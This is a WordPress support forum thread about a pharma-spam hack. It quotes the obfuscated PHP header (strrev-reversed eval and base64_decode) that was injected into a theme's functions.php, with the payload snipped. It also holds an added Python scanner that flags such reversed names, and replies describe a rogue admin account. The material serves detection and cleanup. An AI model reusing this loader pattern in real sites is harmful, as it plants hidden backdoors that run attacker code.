• Hi all,

    After upgrading to WordPress 4.x we started to notice malware inserting links about ‘clomid side effects’ into certain pages. These links were not always easy to read but were beginning to show up in Google searches for our site, so we assumed an SEO attack. Searching for the cause led us to descriptions of the Pharma hack, but the WordPress database did not contain any of the tell-tale entries for that hack.

    However, the tip on Pharma fix pages that malware writers reverse base64_decode to become edoced_46esab led us to find a rogue version of the file functions.php in our custom theme, with a date stamp of Jan 7 05:25 (i.e. just over a week ago).

    The file had been modified to insert at the beginning:

    <?php $wp_function_initialize = create_function('$a',strrev(';)a$(lave'));$wp_function_initialize(strrev(';))"=oQD9pQD7kiIwhGc
    
    <snip>
    
    pR3YuVnZoYWa"(edoced_46esab(lave'));?>

    We have now removed this file and the effect of the hack is gone for now. We have also changed site passwords. I hope this information is useful for others with the same problem.
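    One way to hunt for this kind of reversed-name obfuscation across a theme directory, as an added example that is not code from the original post or from WordPress: it reverses every suspect function name once and looks for those spellings inside PHP string literals, treating strrev() arguments as high-confidence context. The sample PHP header embedded in it is constructed to mimic the injected snippet above, with the encoded payload replaced by a placeholder.

```python
"""Flag PHP source that hides function names by reversing them (strrev / edoced_46esab)."""
import os
import re

# Functions commonly abused by injected PHP; their reversed spellings are the signatures.
SUSPECT_NAMES = {"eval", "base64_decode", "create_function",
                 "gzinflate", "str_rot13", "assert", "system"}
REVERSED_NAMES = {name[::-1]: name for name in SUSPECT_NAMES}  # e.g. "edoced_46esab"

# String literal passed directly to strrev(), and any quoted string literal at all.
STRREV_ARG = re.compile(r"strrev\s*\(\s*(?:'([^']*)'|\"([^\"]*)\")")
STRING_LITERAL = re.compile(r"'([^']*)'|\"([^\"]*)\"")


def _names_in(literal, min_len=0):
    """Suspect names whose reversed form occurs in the literal (optionally only long ones)."""
    return {name for rev, name in REVERSED_NAMES.items()
            if len(name) >= min_len and rev in literal}


def _text(match):
    return match.group(1) if match.group(1) is not None else match.group(2)


def scan_php_source(src):
    """Return a sorted list of suspect function names found reversed in PHP source."""
    found = set()
    # Inside a strrev() argument even short names like "lave" (eval) count: the call
    # itself shows the string is meant to be reversed before use.
    for m in STRREV_ARG.finditer(src):
        found |= _names_in(_text(m))
    # Elsewhere only long reversed names are flagged; short ones such as "lave"
    # occur in ordinary words ("enclave") and would produce false positives.
    for m in STRING_LITERAL.finditer(src):
        found |= _names_in(_text(m), min_len=8)
    return sorted(found)


def scan_theme_dir(root):
    """Walk a directory tree and map each .php path that has findings to its findings."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.endswith(".php"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed sample mimicking the injected header from the post; "QUFB" stands in for the payload.
SAMPLE_PHP = ("<?php $wp_function_initialize = create_function('$a',strrev(';)a$(lave'));"
              "$wp_function_initialize(strrev(';))\"QUFB\"(edoced_46esab(lave'));?>")

if __name__ == "__main__":
    print(scan_php_source(SAMPLE_PHP))  # ['base64_decode', 'eval']
```

Run scan_theme_dir() against a copy of wp-content/themes and compare the flagged files against a clean checkout of the theme; the date stamp check the post describes still applies to anything it reports.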

Viewing 3 replies - 1 through 3 (of 3 total)
  • Moderator James Huff

    (@macmanx)

    Thanks for sharing that!

    To anyone else stopping by here, also make sure that you carefully follow this guide.

    When you’re done, you may want to implement some (if not all) of the recommended security measures.

    I also found a problem with a hack on 2 of my clients’ sites on Feb 18 just before the 4.1.1 maintenance upgrade. After cleaning up suspicious files and upgrading WordPress to 4.1.1, I installed WordFence Security.

    Something triggered an attack again today.

    Today, WordFence security on one of those sites generated a successful logon alert by a (nonexistent) administrator “systemwpadmin”.

    The database did record the login of this user but not a logoff.

    The file manager contained a number of problem files in addition to those noted by the WordFence scan.

    The protocol that James refers to contains all of the steps that I took to clean this up. I also like the article on Hardening WordPress so will be looking at that carefully.

    Hope this will be helpful to someone else.

    Oh my goodness! After proverbially pulling my hair out for the past couple of days, I came across your post. I followed it to the word et voila! Nasty pharmahack gone!

    An eternity of thanks to you, sir, for your help.

  • The topic ‘edoced_46esab malware in theme directory’ is closed to new replies.